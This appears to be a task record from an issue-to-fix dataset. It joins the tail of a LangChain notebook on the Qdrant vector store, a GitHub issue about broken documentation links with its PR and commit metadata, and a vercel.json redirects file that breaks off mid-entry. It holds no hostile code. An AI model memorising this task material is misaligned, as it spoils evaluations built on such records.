] }, { "cell_type": "code", "execution_count": 8, "id": "30a87570", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.854117Z", "start_time": "2023-04-04T10:51:24.845385Z" } }, "outputs": [], "source": [ "url = \"<---qdrant url here --->\"\n", "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " url,\n", " prefer_grpc=True,\n", " collection_name=\"my_documents\",\n", " force_recreate=True,\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "1f9215c8", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T09:27:29.920258Z", "start_time": "2023-04-04T09:27:29.913714Z" } }, "source": [ "## Similarity search\n", "\n", "The simplest scenario for using Qdrant vector store is to perform a similarity search. Under the hood, our query will be encoded with the `embedding_function` and used to find similar documents in Qdrant collection." ] }, { "cell_type": "code", "execution_count": 7, "id": "a8c513ab", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.204469Z", "start_time": "2023-04-04T10:51:24.855618Z" }, "tags": [] }, "outputs": [], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.similarity_search(query)" ] }, { "cell_type": "code", "execution_count": 8, "id": "fc516993", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.220984Z", "start_time": "2023-04-04T10:51:25.213943Z" }, "tags": [] }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.\n" ] } ], "source": [ "print(found_docs[0].page_content)" ] }, { "attachments": {}, "cell_type": "markdown", "id": "1bda9bf5", "metadata": {}, "source": [ "## Similarity search with score\n", "\n", "Sometimes we might want to perform the search, but also obtain a relevancy score to know how good is a particular result. \n", "The returned distance score is cosine distance. Therefore, a lower score is better." ] }, { "cell_type": "code", "execution_count": 11, "id": "8804a21d", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.631585Z", "start_time": "2023-04-04T10:51:25.227384Z" } }, "outputs": [], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.similarity_search_with_score(query)" ] }, { "cell_type": "code", "execution_count": 12, "id": "756a6887", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.642282Z", "start_time": "2023-04-04T10:51:25.635947Z" } }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. 
And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.\n", "\n", "Score: 0.8153784913324512\n" ] } ], "source": [ "document, score = found_docs[0]\n", "print(document.page_content)\n", "print(f\"\\nScore: {score}\")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "525e3582", "metadata": {}, "source": [ "### Metadata filtering\n", "\n", "Qdrant has an [extensive filtering system](https://qdrant.tech/documentation/concepts/filtering/) with rich type support. It is also possible to use the filters in Langchain, by passing an additional param to both the `similarity_search_with_score` and `similarity_search` methods." ] }, { "attachments": {}, "cell_type": "markdown", "id": "1c2c58dc", "metadata": {}, "source": [ "```python\n", "from qdrant_client.http import models as rest\n", "\n", "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.similarity_search_with_score(query, filter=rest.Filter(...))\n", "```" ] }, { "attachments": {}, "cell_type": "markdown", "id": "c58c30bf", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:39:53.032744Z", "start_time": "2023-04-04T10:39:53.028673Z" } }, "source": [ "## Maximum marginal relevance search (MMR)\n", "\n", "If you'd like to look up some similar documents, but you'd also like to receive diverse results, MMR is the method you should consider. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents." ] }, { "cell_type": "code", "execution_count": 13, "id": "76810fb6", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.010947Z", "start_time": "2023-04-04T10:51:25.647687Z" } }, "outputs": [], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.max_marginal_relevance_search(query, k=2, fetch_k=10)" ] }, { "cell_type": "code", "execution_count": 14, "id": "80c6db11", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.016979Z", "start_time": "2023-04-04T10:51:26.013329Z" } }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "1. Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. 
One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence. \n", "\n", "2. We can\u2019t change how divided we\u2019ve been. But we can change how we move forward\u2014on COVID-19 and other issues we must face together. \n", "\n", "I recently visited the New York City Police Department days after the funerals of Officer Wilbert Mora and his partner, Officer Jason Rivera. \n", "\n", "They were responding to a 9-1-1 call when a man shot and killed them with a stolen gun. \n", "\n", "Officer Mora was 27 years old. \n", "\n", "Officer Rivera was 22. \n", "\n", "Both Dominican Americans who\u2019d grown up on the same streets they later chose to patrol as police officers. \n", "\n", "I spoke with their families and told them that we are forever in debt for their sacrifice, and we will carry on their mission to restore the trust and safety every community deserves. \n", "\n", "I\u2019ve worked on these issues a long time. \n", "\n", "I know what works: Investing in crime prevention and community police officers who\u2019ll walk the beat, who\u2019ll know the neighborhood, and who can restore trust and safety. \n", "\n" ] } ], "source": [ "for i, doc in enumerate(found_docs):\n", " print(f\"{i + 1}.\", doc.page_content, \"\\n\")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "691a82d6", "metadata": {}, "source": [ "## Qdrant as a Retriever\n", "\n", "Qdrant, like all the other vector stores, is a LangChain Retriever, using cosine similarity. " ] }, { "cell_type": "code", "execution_count": 15, "id": "9427195f", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.031451Z", "start_time": "2023-04-04T10:51:26.018763Z" } }, "outputs": [ { "data": { "text/plain": [ "VectorStoreRetriever(vectorstore=<langchain.vectorstores.qdrant.Qdrant object at 0x7fc4e5720a00>, search_type='similarity', search_kwargs={})" ] }, "execution_count": 15, "metadata": {}, "output_type": "execute_result" } ], "source": [ "retriever = qdrant.as_retriever()\n", "retriever" ] }, { "attachments": {}, "cell_type": "markdown", "id": "0c851b4f", "metadata": {}, "source": [ "MMR can also be specified as the search strategy, instead of similarity." ] }, { "cell_type": "code", "execution_count": 16, "id": "64348f1b", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.043909Z", "start_time": "2023-04-04T10:51:26.034284Z" } }, "outputs": [ { "data": { "text/plain": [ "VectorStoreRetriever(vectorstore=<langchain.vectorstores.qdrant.Qdrant object at 0x7fc4e5720a00>, search_type='mmr', search_kwargs={})" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "retriever = qdrant.as_retriever(search_type=\"mmr\")\n", "retriever" ] }, { "cell_type": "code", "execution_count": 17, "id": "f3c70c31", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.495652Z", "start_time": "2023-04-04T10:51:26.046407Z" } }, "outputs": [ { "data": { "text/plain": [ "Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. 
\\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.', metadata={'source': '../../../state_of_the_union.txt'})" ] }, "execution_count": 17, "metadata": {}, "output_type": "execute_result" } ], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "retriever.get_relevant_documents(query)[0]" ] }, { "attachments": {}, "cell_type": "markdown", "id": "0358ecde", "metadata": {}, "source": [ "## Customizing Qdrant\n", "\n", "There are some options to use an existing Qdrant collection within your Langchain application. In such cases you may need to define how to map a Qdrant point into the Langchain `Document`.\n", "\n", "### Named vectors\n", "\n", "Qdrant supports [multiple vectors per point](https://qdrant.tech/documentation/concepts/collections/#collection-with-multiple-vectors) via named vectors. Langchain requires just a single embedding per document and, by default, uses a single vector. However, if you work with a collection created externally or want to use a named vector, you can configure it by providing its name.\n" ] }, { "cell_type": "code", "execution_count": null, "outputs": [], "source": [ "Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " location=\":memory:\",\n", " collection_name=\"my_documents_2\",\n", " vector_name=\"custom_vector\",\n", ")" ], "metadata": { "collapsed": false }, "id": "1f11adf8" }, { "cell_type": "markdown", "source": [ "As a Langchain user, you won't see any difference whether you use named vectors or not. The Qdrant integration will handle the conversion under the hood." ], "metadata": { "collapsed": false }, "id": "b34f5230" }, { "cell_type": "markdown", "source": [ "### Metadata\n", "\n", "Qdrant stores your vector embeddings along with the optional JSON-like payload. Payloads are optional, but since LangChain assumes the embeddings are generated from the documents, we keep the context data, so you can extract the original texts as well.\n", "\n", "By default, your document is going to be stored in the following payload structure:\n", "\n", "```json\n", "{\n", " \"page_content\": \"Lorem ipsum dolor sit amet\",\n", " \"metadata\": {\n", " \"foo\": \"bar\"\n", " }\n", "}\n", "```\n", "\n", "You can, however, decide to use different keys for the page content and metadata. That's useful if you already have a collection that you'd like to reuse."
], "metadata": { "collapsed": false }, "id": "b2350093" }, { "cell_type": "code", "execution_count": 19, "id": "e4d6baf9", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T11:08:31.739141Z", "start_time": "2023-04-04T11:08:30.229748Z" } }, "outputs": [ { "data": { "text/plain": [ "<langchain.vectorstores.qdrant.Qdrant at 0x7fc4e2baa230>" ] }, "execution_count": 19, "metadata": {}, "output_type": "execute_result" } ], "source": [ "Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " location=\":memory:\",\n", " collection_name=\"my_documents_2\",\n", " content_payload_key=\"my_page_content_key\",\n", " metadata_payload_key=\"my_meta\",\n", ")" ] }, { "cell_type": "code", "execution_count": null, "id": "2300e785", "metadata": {}, "outputs": [], "source": [] } ], "metadata": { "kernelspec": { "display_name": "Python 3 (ipykernel)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.11.3" } }, "nbformat": 4, "nbformat_minor": 5 }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,477
DOC: Broken Links in Prompts Sub Categories Pages
### Issue with current documentation: The INFO: Python Guide links in both https://docs.langchain.com/docs/components/prompts/prompt-template and https://docs.langchain.com/docs/components/prompts/example-selectors are broken (similar to #8105). ### Idea or request for content: The pages have simply been moved from https://python.langchain.com/docs/modules/prompts/ to https://python.langchain.com/docs/modules/model_io/prompts/, so setting up the corresponding redirects should fix it. I can open a PR with the corresponding redirects myself.
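Not from the original issue: the fix would plausibly append wildcard redirects of the following shape to the `redirects` array in `docs/docs_skeleton/vercel.json`, mirroring the `:path*` pattern already used throughout that file (shown as a Python literal for illustration; the exact sources and destinations would need to be confirmed in the PR):

```python
# Hypothetical redirect entries for the moved prompts pages.
new_redirects = [
    {
        "source": "/docs/modules/prompts/:path*",
        "destination": "/docs/modules/model_io/prompts/:path*",
    },
]
```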
https://github.com/langchain-ai/langchain/issues/8477
https://github.com/langchain-ai/langchain/pull/8478
08f5e6b8012f5eda2609103f33676199a3781a15
04ebdbe98f99624aa2adc42c9f622a9668967878
"2023-07-30T04:41:57Z"
python
"2023-07-31T02:38:52Z"
docs/docs_skeleton/vercel.json
{ "redirects": [ { "source": "/en/latest/additional_resources/youtube.html", "destination": "/docs/additional_resources/youtube" }, { "source": "/en/latest/integrations/agent_with_wandb_tracing.html", "destination": "/docs/integrations/providers/agent_with_wandb_tracing" }, { "source": "/docs/integrations/agent_with_wandb_tracing", "destination": "/docs/integrations/providers/agent_with_wandb_tracing" }, { "source": "/en/latest/integrations/ai21.html", "destination": "/docs/integrations/providers/ai21" }, { "source": "/docs/integrations/ai21", "destination": "/docs/integrations/providers/ai21" }, { "source": "/en/latest/integrations/aim_tracking.html", "destination": "/docs/integrations/providers/aim_tracking" }, { "source": "/docs/integrations/aim_tracking", "destination": "/docs/integrations/providers/aim_tracking" }, { "source": "/en/latest/integrations/airbyte.html", "destination": "/docs/integrations/providers/airbyte" }, { "source": "/docs/integrations/airbyte", "destination": "/docs/integrations/providers/airbyte" }, { "source": "/en/latest/integrations/aleph_alpha.html", "destination": "/docs/integrations/providers/aleph_alpha" }, { "source": "/docs/integrations/aleph_alpha", "destination": "/docs/integrations/providers/aleph_alpha" }, { "source": "/en/latest/integrations/analyticdb.html", "destination": "/docs/integrations/providers/analyticdb" }, { "source": "/docs/integrations/analyticdb", "destination": "/docs/integrations/providers/analyticdb" }, { "source": "/en/latest/integrations/annoy.html", "destination": "/docs/integrations/providers/annoy" }, { "source": "/docs/integrations/annoy", "destination": "/docs/integrations/providers/annoy" }, { "source": "/en/latest/integrations/anyscale.html", "destination": "/docs/integrations/providers/anyscale" }, { "source": "/docs/integrations/anyscale", "destination": "/docs/integrations/providers/anyscale" }, { "source": "/en/latest/integrations/apify.html", "destination": "/docs/integrations/providers/apify" }, { "source": "/docs/integrations/apify", "destination": "/docs/integrations/providers/apify" }, { "source": "/en/latest/integrations/argilla.html", "destination": "/docs/integrations/providers/argilla" }, { "source": "/docs/integrations/argilla", "destination": "/docs/integrations/providers/argilla" }, { "source": "/en/latest/integrations/arxiv.html", "destination": "/docs/integrations/providers/arxiv" }, { "source": "/docs/integrations/arxiv", "destination": "/docs/integrations/providers/arxiv" }, { "source": "/en/latest/integrations/atlas.html", "destination": "/docs/integrations/providers/atlas" }, { "source": "/docs/integrations/atlas", "destination": "/docs/integrations/providers/atlas" }, { "source": "/en/latest/integrations/awadb.html", "destination": "/docs/integrations/providers/awadb" }, { "source": "/docs/integrations/awadb", "destination": "/docs/integrations/providers/awadb" }, { "source": "/en/latest/integrations/aws_s3.html", "destination": "/docs/integrations/providers/aws_s3" }, { "source": "/docs/integrations/aws_s3", "destination": "/docs/integrations/providers/aws_s3" }, { "source": "/en/latest/integrations/azlyrics.html", "destination": "/docs/integrations/providers/azlyrics" }, { "source": "/docs/integrations/azlyrics", "destination": "/docs/integrations/providers/azlyrics" }, { "source": "/en/latest/integrations/azure_blob_storage.html", "destination": "/docs/integrations/providers/azure_blob_storage" }, { "source": "/docs/integrations/azure_blob_storage", "destination": 
"/docs/integrations/providers/azure_blob_storage" }, { "source": "/en/latest/integrations/azure_cognitive_search_.html", "destination": "/docs/integrations/providers/azure_cognitive_search_" }, { "source": "/docs/integrations/azure_cognitive_search_", "destination": "/docs/integrations/providers/azure_cognitive_search_" }, { "source": "/en/latest/integrations/azure_openai.html", "destination": "/docs/integrations/providers/azure_openai" }, { "source": "/docs/integrations/azure_openai", "destination": "/docs/integrations/providers/azure_openai" }, { "source": "/en/latest/integrations/bananadev.html", "destination": "/docs/integrations/providers/bananadev" }, { "source": "/docs/integrations/bananadev", "destination": "/docs/integrations/providers/bananadev" }, { "source": "/en/latest/ecosystem/baseten.html", "destination": "/docs/integrations/providers/baseten" }, { "source": "/docs/integrations/baseten", "destination": "/docs/integrations/providers/baseten" }, { "source": "/en/latest/integrations/beam.html", "destination": "/docs/integrations/providers/beam" }, { "source": "/docs/integrations/beam", "destination": "/docs/integrations/providers/beam" }, { "source": "/en/latest/integrations/amazon_bedrock.html", "destination": "/docs/integrations/providers/bedrock" }, { "source": "/docs/integrations/bedrock", "destination": "/docs/integrations/providers/bedrock" }, { "source": "/en/latest/integrations/bilibili.html", "destination": "/docs/integrations/providers/bilibili" }, { "source": "/docs/integrations/bilibili", "destination": "/docs/integrations/providers/bilibili" }, { "source": "/en/latest/integrations/blackboard.html", "destination": "/docs/integrations/providers/blackboard" }, { "source": "/docs/integrations/blackboard", "destination": "/docs/integrations/providers/blackboard" }, { "source": "/en/latest/integrations/cassandra.html", "destination": "/docs/integrations/providers/cassandra" }, { "source": "/docs/integrations/cassandra", "destination": "/docs/integrations/providers/cassandra" }, { "source": "/en/latest/integrations/cerebriumai.html", "destination": "/docs/integrations/providers/cerebriumai" }, { "source": "/docs/integrations/cerebriumai", "destination": "/docs/integrations/providers/cerebriumai" }, { "source": "/en/latest/integrations/chroma.html", "destination": "/docs/integrations/providers/chroma" }, { "source": "/docs/integrations/chroma", "destination": "/docs/integrations/providers/chroma" }, { "source": "/en/latest/integrations/clearml_tracking.html", "destination": "/docs/integrations/providers/clearml_tracking" }, { "source": "/docs/integrations/clearml_tracking", "destination": "/docs/integrations/providers/clearml_tracking" }, { "source": "/en/latest/integrations/cohere.html", "destination": "/docs/integrations/providers/cohere" }, { "source": "/docs/integrations/cohere", "destination": "/docs/integrations/providers/cohere" }, { "source": "/en/latest/integrations/college_confidential.html", "destination": "/docs/integrations/providers/college_confidential" }, { "source": "/docs/integrations/college_confidential", "destination": "/docs/integrations/providers/college_confidential" }, { "source": "/en/latest/integrations/comet_tracking.html", "destination": "/docs/integrations/providers/comet_tracking" }, { "source": "/docs/integrations/comet_tracking", "destination": "/docs/integrations/providers/comet_tracking" }, { "source": "/en/latest/integrations/confluence.html", "destination": "/docs/integrations/providers/confluence" }, { "source": 
"/docs/integrations/confluence", "destination": "/docs/integrations/providers/confluence" }, { "source": "/en/latest/integrations/ctransformers.html", "destination": "/docs/integrations/providers/ctransformers" }, { "source": "/docs/integrations/ctransformers", "destination": "/docs/integrations/providers/ctransformers" }, { "source": "/en/latest/integrations/databerry.html", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/docs/integrations/chaindesk", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/docs/integrations/databerry", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/docs/integrations/chaindesk", "destination": "/docs/integrations/providers/chaindesk" }, { "source": "/en/latest/integrations/databricks/databricks.html", "destination": "/docs/integrations/providers/databricks" }, { "source": "/docs/integrations/databricks", "destination": "/docs/integrations/providers/databricks" }, { "source": "/en/latest/integrations/databricks.html", "destination": "/docs/integrations/providers/databricks" }, { "source": "/docs/integrations/databricks", "destination": "/docs/integrations/providers/databricks" }, { "source": "/en/latest/integrations/deepinfra.html", "destination": "/docs/integrations/providers/deepinfra" }, { "source": "/docs/integrations/deepinfra", "destination": "/docs/integrations/providers/deepinfra" }, { "source": "/en/latest/integrations/deeplake.html", "destination": "/docs/integrations/providers/deeplake" }, { "source": "/docs/integrations/deeplake", "destination": "/docs/integrations/providers/deeplake" }, { "source": "/en/latest/integrations/diffbot.html", "destination": "/docs/integrations/providers/diffbot" }, { "source": "/docs/integrations/diffbot", "destination": "/docs/integrations/providers/diffbot" }, { "source": "/en/latest/integrations/discord.html", "destination": "/docs/integrations/providers/discord" }, { "source": "/docs/integrations/discord", "destination": "/docs/integrations/providers/discord" }, { "source": "/en/latest/integrations/docugami.html", "destination": "/docs/integrations/providers/docugami" }, { "source": "/docs/integrations/docugami", "destination": "/docs/integrations/providers/docugami" }, { "source": "/en/latest/integrations/duckdb.html", "destination": "/docs/integrations/providers/duckdb" }, { "source": "/docs/integrations/duckdb", "destination": "/docs/integrations/providers/duckdb" }, { "source": "/en/latest/integrations/elasticsearch.html", "destination": "/docs/integrations/providers/elasticsearch" }, { "source": "/docs/integrations/elasticsearch", "destination": "/docs/integrations/providers/elasticsearch" }, { "source": "/en/latest/integrations/evernote.html", "destination": "/docs/integrations/providers/evernote" }, { "source": "/docs/integrations/evernote", "destination": "/docs/integrations/providers/evernote" }, { "source": "/en/latest/integrations/facebook_chat.html", "destination": "/docs/integrations/providers/facebook_chat" }, { "source": "/docs/integrations/facebook_chat", "destination": "/docs/integrations/providers/facebook_chat" }, { "source": "/en/latest/integrations/figma.html", "destination": "/docs/integrations/providers/figma" }, { "source": "/docs/integrations/figma", "destination": "/docs/integrations/providers/figma" }, { "source": "/en/latest/integrations/forefrontai.html", "destination": "/docs/integrations/providers/forefrontai" }, { "source": "/docs/integrations/forefrontai", "destination": "/docs/integrations/providers/forefrontai" 
}, { "source": "/en/latest/integrations/git.html", "destination": "/docs/integrations/providers/git" }, { "source": "/docs/integrations/git", "destination": "/docs/integrations/providers/git" }, { "source": "/en/latest/integrations/gitbook.html", "destination": "/docs/integrations/providers/gitbook" }, { "source": "/docs/integrations/gitbook", "destination": "/docs/integrations/providers/gitbook" }, { "source": "/en/latest/integrations/google_bigquery.html", "destination": "/docs/integrations/providers/google_bigquery" }, { "source": "/docs/integrations/google_bigquery", "destination": "/docs/integrations/providers/google_bigquery" }, { "source": "/en/latest/integrations/google_cloud_storage.html", "destination": "/docs/integrations/providers/google_cloud_storage" }, { "source": "/docs/integrations/google_cloud_storage", "destination": "/docs/integrations/providers/google_cloud_storage" }, { "source": "/en/latest/integrations/google_drive.html", "destination": "/docs/integrations/providers/google_drive" }, { "source": "/docs/integrations/google_drive", "destination": "/docs/integrations/providers/google_drive" }, { "source": "/en/latest/integrations/google_search.html", "destination": "/docs/integrations/providers/google_search" }, { "source": "/docs/integrations/google_search", "destination": "/docs/integrations/providers/google_search" }, { "source": "/en/latest/integrations/google_serper.html", "destination": "/docs/integrations/providers/google_serper" }, { "source": "/docs/integrations/google_serper", "destination": "/docs/integrations/providers/google_serper" }, { "source": "/en/latest/integrations/gooseai.html", "destination": "/docs/integrations/providers/gooseai" }, { "source": "/docs/integrations/gooseai", "destination": "/docs/integrations/providers/gooseai" }, { "source": "/en/latest/integrations/gpt4all.html", "destination": "/docs/integrations/providers/gpt4all" }, { "source": "/docs/integrations/gpt4all", "destination": "/docs/integrations/providers/gpt4all" }, { "source": "/en/latest/integrations/graphsignal.html", "destination": "/docs/integrations/providers/graphsignal" }, { "source": "/docs/integrations/graphsignal", "destination": "/docs/integrations/providers/graphsignal" }, { "source": "/en/latest/integrations/gutenberg.html", "destination": "/docs/integrations/providers/gutenberg" }, { "source": "/docs/integrations/gutenberg", "destination": "/docs/integrations/providers/gutenberg" }, { "source": "/en/latest/integrations/hacker_news.html", "destination": "/docs/integrations/providers/hacker_news" }, { "source": "/docs/integrations/hacker_news", "destination": "/docs/integrations/providers/hacker_news" }, { "source": "/en/latest/integrations/hazy_research.html", "destination": "/docs/integrations/providers/hazy_research" }, { "source": "/docs/integrations/hazy_research", "destination": "/docs/integrations/providers/hazy_research" }, { "source": "/en/latest/integrations/helicone.html", "destination": "/docs/integrations/providers/helicone" }, { "source": "/docs/integrations/helicone", "destination": "/docs/integrations/providers/helicone" }, { "source": "/en/latest/integrations/huggingface.html", "destination": "/docs/integrations/providers/huggingface" }, { "source": "/docs/integrations/huggingface", "destination": "/docs/integrations/providers/huggingface" }, { "source": "/en/latest/integrations/ifixit.html", "destination": "/docs/integrations/providers/ifixit" }, { "source": "/docs/integrations/ifixit", "destination": "/docs/integrations/providers/ifixit" }, { 
"source": "/en/latest/integrations/imsdb.html", "destination": "/docs/integrations/providers/imsdb" }, { "source": "/docs/integrations/imsdb", "destination": "/docs/integrations/providers/imsdb" }, { "source": "/en/latest/integrations/jina.html", "destination": "/docs/integrations/providers/jina" }, { "source": "/docs/integrations/jina", "destination": "/docs/integrations/providers/jina" }, { "source": "/en/latest/integrations/lancedb.html", "destination": "/docs/integrations/providers/lancedb" }, { "source": "/docs/integrations/lancedb", "destination": "/docs/integrations/providers/lancedb" }, { "source": "/en/latest/integrations/langchain_decorators.html", "destination": "/docs/integrations/providers/langchain_decorators" }, { "source": "/docs/integrations/langchain_decorators", "destination": "/docs/integrations/providers/langchain_decorators" }, { "source": "/en/latest/integrations/llamacpp.html", "destination": "/docs/integrations/providers/llamacpp" }, { "source": "/docs/integrations/llamacpp", "destination": "/docs/integrations/providers/llamacpp" }, { "source": "/en/latest/integrations/mediawikidump.html", "destination": "/docs/integrations/providers/mediawikidump" }, { "source": "/docs/integrations/mediawikidump", "destination": "/docs/integrations/providers/mediawikidump" }, { "source": "/en/latest/integrations/metal.html", "destination": "/docs/integrations/providers/metal" }, { "source": "/docs/integrations/metal", "destination": "/docs/integrations/providers/metal" }, { "source": "/en/latest/integrations/microsoft_onedrive.html", "destination": "/docs/integrations/providers/microsoft_onedrive" }, { "source": "/docs/integrations/microsoft_onedrive", "destination": "/docs/integrations/providers/microsoft_onedrive" }, { "source": "/en/latest/integrations/microsoft_powerpoint.html", "destination": "/docs/integrations/providers/microsoft_powerpoint" }, { "source": "/docs/integrations/microsoft_powerpoint", "destination": "/docs/integrations/providers/microsoft_powerpoint" }, { "source": "/en/latest/integrations/microsoft_word.html", "destination": "/docs/integrations/providers/microsoft_word" }, { "source": "/docs/integrations/microsoft_word", "destination": "/docs/integrations/providers/microsoft_word" }, { "source": "/en/latest/integrations/milvus.html", "destination": "/docs/integrations/providers/milvus" }, { "source": "/docs/integrations/milvus", "destination": "/docs/integrations/providers/milvus" }, { "source": "/en/latest/integrations/mlflow_tracking.html", "destination": "/docs/integrations/providers/mlflow_tracking" }, { "source": "/docs/integrations/mlflow_tracking", "destination": "/docs/integrations/providers/mlflow_tracking" }, { "source": "/en/latest/integrations/modal.html", "destination": "/docs/integrations/providers/modal" }, { "source": "/docs/integrations/modal", "destination": "/docs/integrations/providers/modal" }, { "source": "/en/latest/ecosystem/modelscope.html", "destination": "/docs/integrations/providers/modelscope" }, { "source": "/docs/integrations/modelscope", "destination": "/docs/integrations/providers/modelscope" }, { "source": "/en/latest/integrations/modern_treasury.html", "destination": "/docs/integrations/providers/modern_treasury" }, { "source": "/docs/integrations/modern_treasury", "destination": "/docs/integrations/providers/modern_treasury" }, { "source": "/en/latest/integrations/momento.html", "destination": "/docs/integrations/providers/momento" }, { "source": "/docs/integrations/momento", "destination": 
"/docs/integrations/providers/momento" }, { "source": "/en/latest/integrations/myscale.html", "destination": "/docs/integrations/providers/myscale" }, { "source": "/docs/integrations/myscale", "destination": "/docs/integrations/providers/myscale" }, { "source": "/en/latest/integrations/nlpcloud.html", "destination": "/docs/integrations/providers/nlpcloud" }, { "source": "/docs/integrations/nlpcloud", "destination": "/docs/integrations/providers/nlpcloud" }, { "source": "/en/latest/integrations/notion.html", "destination": "/docs/integrations/providers/notion" }, { "source": "/docs/integrations/notion", "destination": "/docs/integrations/providers/notion" }, { "source": "/en/latest/integrations/obsidian.html", "destination": "/docs/integrations/providers/obsidian" }, { "source": "/docs/integrations/obsidian", "destination": "/docs/integrations/providers/obsidian" }, { "source": "/en/latest/integrations/openai.html", "destination": "/docs/integrations/providers/openai" }, { "source": "/docs/integrations/openai", "destination": "/docs/integrations/providers/openai" }, { "source": "/en/latest/integrations/opensearch.html", "destination": "/docs/integrations/providers/opensearch" }, { "source": "/docs/integrations/opensearch", "destination": "/docs/integrations/providers/opensearch" }, { "source": "/en/latest/integrations/openweathermap.html", "destination": "/docs/integrations/providers/openweathermap" }, { "source": "/docs/integrations/openweathermap", "destination": "/docs/integrations/providers/openweathermap" }, { "source": "/en/latest/integrations/petals.html", "destination": "/docs/integrations/providers/petals" }, { "source": "/docs/integrations/petals", "destination": "/docs/integrations/providers/petals" }, { "source": "/en/latest/integrations/pgvector.html", "destination": "/docs/integrations/providers/pgvector" }, { "source": "/docs/integrations/pgvector", "destination": "/docs/integrations/providers/pgvector" }, { "source": "/en/latest/integrations/pinecone.html", "destination": "/docs/integrations/providers/pinecone" }, { "source": "/docs/integrations/pinecone", "destination": "/docs/integrations/providers/pinecone" }, { "source": "/en/latest/integrations/pipelineai.html", "destination": "/docs/integrations/providers/pipelineai" }, { "source": "/docs/integrations/pipelineai", "destination": "/docs/integrations/providers/pipelineai" }, { "source": "/en/latest/integrations/predictionguard.html", "destination": "/docs/integrations/providers/predictionguard" }, { "source": "/docs/integrations/predictionguard", "destination": "/docs/integrations/providers/predictionguard" }, { "source": "/en/latest/integrations/promptlayer.html", "destination": "/docs/integrations/providers/promptlayer" }, { "source": "/docs/integrations/promptlayer", "destination": "/docs/integrations/providers/promptlayer" }, { "source": "/en/latest/integrations/psychic.html", "destination": "/docs/integrations/providers/psychic" }, { "source": "/docs/integrations/psychic", "destination": "/docs/integrations/providers/psychic" }, { "source": 